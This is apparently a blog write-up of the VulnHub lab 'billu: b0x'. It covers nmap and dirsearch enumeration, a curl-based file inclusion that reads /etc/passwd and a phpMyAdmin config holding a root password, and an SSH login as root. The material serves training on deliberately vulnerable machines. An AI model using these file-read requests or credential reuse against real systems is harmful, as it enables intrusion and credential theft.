5 December 2022

Pentesting Fun Stuff

following the cyber security path…

billu: b0x

Location

https://download.vulnhub.com/billu/Billu_b0x.zip

Introduction

This is the first Boot2Root from Manish Kishan Tanwar and the official description is not telling much, except that it’s using Ubuntu, PHP, MySQL and Apache. This challenge should have medium difficulty with tricks. The goal is to break into the VM using web application and from there escalate privileges to gain root access.

Getting started

Let’s see what is running on this system.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -sV -sC -T4 -p- 192.168.56.107
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-21 15:03 CEST
Nmap scan report for 192.168.56.107
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds

When browsing to the webserver I get a login page which invites me to do some SQL injection.

After several manual and automated tries I get no luck with the SQLi invitation. Next step is some enumeration.

┌─[n13mant@planetmars]─[~/Documents/Apps/dirsearch]
└──╼ $python3 dirsearch.py -u "http://192.168.56.107" -e php,html -x 403 -r
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php, html | Threads: 10 | Wordlist size: 5542
Error Log: /home/n13mant/Documents/Apps/dirsearch/logs/errors-17-05-10_15-15-54.log
Target: http://192.168.56.107
[15:15:54] Starting:
[15:15:58] 200 -  307B  - /add
[15:15:58] 200 -  307B  - /add.php
[15:16:01] 200 -    1B  - /c
[15:16:05] 200 -    3KB - /head.php
[15:16:05] 301 -  317B  - /images  ->  http://192.168.56.107/images/
[15:16:05] 200 -   47KB - /in
[15:16:05] 200 -    3KB - /index
[15:16:05] 200 -    3KB - /index.php
[15:16:09] 302 -    2KB - /panel.php  ->  index.php
[15:16:10] 200 -    8KB - /phpmy/
[15:16:12] 200 -    1B  - /show
[15:16:13] 200 -   72B  - /test.php
[15:16:13] 200 -   72B  - /test
[15:16:14] Starting: phpmy/
[15:16:16] 200 -  227B  - /phpmy/CREDITS
[15:16:16] 200 -   28KB - /phpmy/ChangeLog
[15:16:16] 200 -  128B  - /phpmy/INSTALL
[15:16:16] 200 -    2KB - /phpmy/README
[15:16:17] 200 -  190B  - /phpmy/TODO
[15:16:22] 200 -    0B  - /phpmy/config.inc.php
[15:16:22] 200 -    0B  - /phpmy/config.inc
[15:16:23] 200 -    3KB - /phpmy/docs
[15:16:23] 200 -   18KB - /phpmy/favicon.ico
[15:16:23] 200 -    8KB - /phpmy/export
[15:16:24] 200 -    8KB - /phpmy/import
[15:16:24] 200 -    8KB - /phpmy/import.php
[15:16:24] 200 -    8KB - /phpmy/index
[15:16:24] 200 -    8KB - /phpmy/index.php
[15:16:25] 301 -  319B  - /phpmy/js  ->  http://192.168.56.107/phpmy/js/
[15:16:25] 301 -  326B  - /phpmy/libraries  ->  http://192.168.56.107/phpmy/libraries/
[15:16:26] 200 -    8KB - /phpmy/main.php
[15:16:26] 200 -    8KB - /phpmy/main
[15:16:27] 200 -    8KB - /phpmy/phpinfo
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:27] 200 -   41KB - /phpmy/phpmyadmin
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:28] 200 -    1KB - /phpmy/print
[15:16:28] 200 -   26B  - /phpmy/robots.txt
[15:16:28] 200 -    3KB - /phpmy/scripts/
[15:16:28] 301 -  324B  - /phpmy/scripts  ->  http://192.168.56.107/phpmy/scripts/
[15:16:29] 301 -  322B  - /phpmy/setup  ->  http://192.168.56.107/phpmy/setup/
[15:16:29] 200 -   13KB - /phpmy/setup/
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql
[15:16:31] 301 -  323B  - /phpmy/themes  ->  http://192.168.56.107/phpmy/themes/
[15:16:32] 200 -    8KB - /phpmy/url
[15:16:32] Starting: phpmy/scripts/
[15:16:49] 200 -    5KB - /phpmy/scripts/upgrade
[15:16:50] Starting: phpmy/setup/
[15:16:59] 303 -    0B  - /phpmy/setup/config
[15:16:59] 303 -    0B  - /phpmy/setup/config.php
[15:16:59] 303 -    0B  - /phpmy/setup/config.php
[15:17:01] 200 -   13KB - /phpmy/setup/index.php
[15:17:01] 200 -   13KB - /phpmy/setup/index
[15:17:02] 301 -  326B  - /phpmy/setup/lib  ->  http://192.168.56.107/phpmy/setup/lib/
[15:17:05] 200 -    5KB - /phpmy/setup/scripts
[15:17:07] 200 -    7KB - /phpmy/setup/styles
Task Completed

Looks like the SQLi invitation was a distraction. Several interesting pages, including a  phpMyAdmin page.
First I’ll take a look at add.php. Unfortunately it doens’t really do anything except wasting my time.

Next one on my list is  test.php.

It needs a ‘file’ parameter.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/etc/passwd" http://192.168.56.107/test.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

Now for some credentials.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/var/www/phpmy/config.inc.php" http://192.168.56.107/test.php
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>

Wow….that was almost to easy.

┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh root@192.168.56.107 -p 22
root@192.168.56.107's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Wed May 24 19:56:10 IST 2017
  System load:  0.0               Processes:           75
  Usage of /:   11.9% of 9.61GB   Users logged in:     0
  Memory usage: 8%                IP address for eth0: 192.168.56.107
  Swap usage:   0%
  Graph this data and manage this system at:
    https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
root@indishell:~#

Sweet.  But I still got some question marks left. What about those odd pages in the DirSearch scan? What about phpMyAdmin?
It feels like I cheated with gaining the root key.

Conclusion

This was a fun challenge with some nice features. The final part was over faster then I had anticipated and I think there are maybe multiple ways to get there. But for now I’m content. Maybe at a later stage I’ll explore other options and update this post.
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.